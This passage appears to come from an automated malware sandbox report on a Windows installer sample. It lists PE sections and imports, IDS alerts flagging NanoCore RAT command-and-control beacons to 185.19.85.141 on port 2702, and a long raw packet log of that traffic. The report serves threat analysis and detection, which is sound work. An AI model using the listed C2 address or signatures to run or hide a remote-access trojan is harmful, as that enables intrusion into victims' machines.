                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x66760x6800False0.656813401442data6.41745998719IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x139a0x1400False0.4498046875data5.14106681717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x203780x600False0.509765625data4.11058212765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                        .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .rsrc0x3b0000xa500xc00False0.402018229167data4.18462166815IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        NameRVASizeTypeLanguageCountry
                                                        RT_ICON0x3b1900x2e8dataEnglishUnited States
                                                        RT_DIALOG0x3b4780x100dataEnglishUnited States
                                                        RT_DIALOG0x3b5780x11cdataEnglishUnited States
                                                        RT_DIALOG0x3b6980x60dataEnglishUnited States
                                                        RT_GROUP_ICON0x3b6f80x14dataEnglishUnited States
                                                        RT_MANIFEST0x3b7100x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                        DLLImport
                                                        ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                        SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                        USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States
                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        192.168.2.3185.19.85.1414977627022816766 05/17/22-12:14:39.410802TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497762702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976827022025019 05/17/22-12:14:22.484039TCP2025019ET TROJAN Possible NanoCore C2 60B497682702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976627022816766 05/17/22-12:14:10.385891TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497662702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414975327022816766 05/17/22-12:13:17.032873TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497532702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976127022025019 05/17/22-12:13:48.368799TCP2025019ET TROJAN Possible NanoCore C2 60B497612702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414975827022025019 05/17/22-12:13:28.167370TCP2025019ET TROJAN Possible NanoCore C2 60B497582702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976327022816766 05/17/22-12:14:04.353308TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497632702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414974627022816766 05/17/22-12:13:08.303726TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497462702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414977427022025019 05/17/22-12:14:28.783170TCP2025019ET TROJAN Possible NanoCore C2 60B497742702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414975927022025019 05/17/22-12:13:35.677991TCP2025019ET TROJAN Possible NanoCore C2 60B497592702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976227022025019 05/17/22-12:13:55.935835TCP2025019ET TROJAN Possible NanoCore C2 60B497622702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414975927022816766 05/17/22-12:13:37.610009TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497592702192.168.2.3185.19.85.141
                                                        185.19.85.141192.168.2.32702497772841753 05/17/22-12:14:49.052826TCP2841753ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound)270249777185.19.85.141192.168.2.3
                                                        192.168.2.3185.19.85.1414974627022816718 05/17/22-12:13:08.062740TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon497462702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976027022816766 05/17/22-12:13:43.986891TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497602702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976627022816718 05/17/22-12:14:09.332904TCP2816718ETPRO TROJAN NanoCore RAT Keep-Alive Beacon497662702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414974627022025019 05/17/22-12:13:06.238856TCP2025019ET TROJAN Possible NanoCore C2 60B497462702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414977427022816766 05/17/22-12:14:31.555929TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497742702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414975327022025019 05/17/22-12:13:12.793529TCP2025019ET TROJAN Possible NanoCore C2 60B497532702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414974327022025019 05/17/22-12:13:00.042311TCP2025019ET TROJAN Possible NanoCore C2 60B497432702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976327022025019 05/17/22-12:14:02.189654TCP2025019ET TROJAN Possible NanoCore C2 60B497632702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976827022816766 05/17/22-12:14:24.492812TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497682702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414975827022816766 05/17/22-12:13:30.051681TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497582702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976127022816766 05/17/22-12:13:50.122915TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497612702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976627022025019 05/17/22-12:14:08.849775TCP2025019ET TROJAN Possible NanoCore C2 60B497662702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414977627022025019 05/17/22-12:14:37.723918TCP2025019ET TROJAN Possible NanoCore C2 60B497762702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414977727022816766 05/17/22-12:14:44.772947TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497772702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976727022816766 05/17/22-12:14:17.723901TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497672702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414975727022025019 05/17/22-12:13:21.755444TCP2025019ET TROJAN Possible NanoCore C2 60B497572702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976027022025019 05/17/22-12:13:42.065696TCP2025019ET TROJAN Possible NanoCore C2 60B497602702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414975727022816766 05/17/22-12:13:23.742694TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497572702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976227022816766 05/17/22-12:13:57.882898TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497622702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414976727022025019 05/17/22-12:14:15.714757TCP2025019ET TROJAN Possible NanoCore C2 60B497672702192.168.2.3185.19.85.141
                                                        185.19.85.141192.168.2.32702497582810290 05/17/22-12:13:29.940778TCP2810290ETPRO TROJAN NanoCore RAT Keepalive Response 1270249758185.19.85.141192.168.2.3
                                                        192.168.2.3185.19.85.1414974327022816766 05/17/22-12:13:01.734611TCP2816766ETPRO TROJAN NanoCore RAT CnC 7497432702192.168.2.3185.19.85.141
                                                        192.168.2.3185.19.85.1414977727022025019 05/17/22-12:14:43.866227TCP2025019ET TROJAN Possible NanoCore C2 60B497772702192.168.2.3185.19.85.141
                                                        TimestampSource PortDest PortSource IPDest IP
                                                        May 17, 2022 12:12:58.956697941 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:12:59.160536051 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:12:59.160729885 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:00.042310953 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:00.287528992 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:00.287609100 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:00.353543997 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:00.353671074 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:00.522655964 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:00.522788048 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:00.602818012 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:00.702936888 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:00.703044891 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:00.935748100 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:00.935895920 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:01.186919928 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:01.187096119 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:01.734611034 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:01.863965034 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:01.922688007 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:01.922936916 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:02.054430962 CEST270249743185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:02.054537058 CEST497432702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:06.023225069 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:06.237549067 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:06.237700939 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:06.238856077 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:06.473557949 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:06.473676920 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:06.713401079 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:06.713510990 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:06.959625006 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:06.959933996 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:07.212682009 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:07.212876081 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:07.453071117 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:07.453197002 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:07.692661047 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:07.692796946 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:07.824592113 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:07.824865103 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:07.934544086 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:07.934643030 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:08.062591076 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:08.062740088 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:08.139667034 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:08.235142946 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:08.303575039 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:08.303725958 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:08.471884966 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:08.552557945 CEST270249746185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:08.552649975 CEST497462702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:12.610872030 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:12.792789936 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:12.792980909 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:12.793529034 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:13.042582989 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:13.042685986 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:13.124342918 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:13.124468088 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:13.280760050 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:13.280884027 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:13.365154982 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:13.497915030 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:13.500196934 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:13.730475903 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:13.871195078 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:14.121586084 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:14.122246027 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:14.354686975 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:14.354851007 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:14.585453033 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:14.585588932 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:14.832504988 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:14.832653046 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.082676888 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.089975119 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.090719938 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.090826035 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.091840982 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.092984915 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.093141079 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.272936106 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.273741961 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.273927927 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.274801016 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.279911995 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.280157089 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.280900955 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.282109022 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.282471895 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.287553072 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.287585020 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.287705898 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.463018894 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.463833094 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.463953018 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.464804888 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.464838982 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.464975119 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.465828896 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.466823101 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.466939926 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.467859030 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.477097988 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.477159977 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.477204084 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.477258921 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.477619886 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.477680922 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.477683067 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.477756977 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.478621006 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.478729010 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.478811026 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.478851080 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.478924990 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.478991032 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.652908087 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.653852940 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.653948069 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.654798985 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.655013084 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.655082941 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.657016039 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.657601118 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.657711029 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.658026934 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.658067942 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.658138037 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.666873932 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.670136929 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.670238018 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.670277119 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.670331001 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.670378923 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.670532942 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.670595884 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.670650005 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.670690060 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.670876980 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.670941114 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.670985937 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.671030045 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.671081066 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.671137094 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.671262980 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.671324968 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.671413898 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.671960115 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.672032118 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.672441006 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.677850008 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.677947998 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.677972078 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.678061008 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.678128004 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.678258896 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.678386927 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.678458929 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.678615093 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.678809881 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.678867102 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.679028034 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.679117918 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.679183960 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.793663025 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.842890978 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.843112946 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.843830109 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.844014883 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.844785929 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.844928980 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.845777035 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.845892906 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.846046925 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.846107960 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.846714020 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.846784115 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.847735882 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.847893953 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.848836899 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.848865032 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.849030018 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.850061893 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.850167990 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.850811958 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.850915909 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.851819038 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.851917028 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.851924896 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.851984024 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.853132963 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.853240967 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.859148979 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.859245062 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.859338999 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.859385014 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.859417915 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.859479904 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.859581947 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.859685898 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.859731913 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.859781981 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.859872103 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.859930038 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.860152006 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.860229015 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.860388994 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.860464096 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.860897064 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.860975027 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.861399889 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.861504078 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.861725092 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.861814976 CEST270249753185.19.85.141192.168.2.3
                                                        May 17, 2022 12:13:15.861848116 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.861947060 CEST497532702192.168.2.3185.19.85.141
                                                        May 17, 2022 12:13:15.862847090 CEST270249753185.19.85.141192.168.2.3
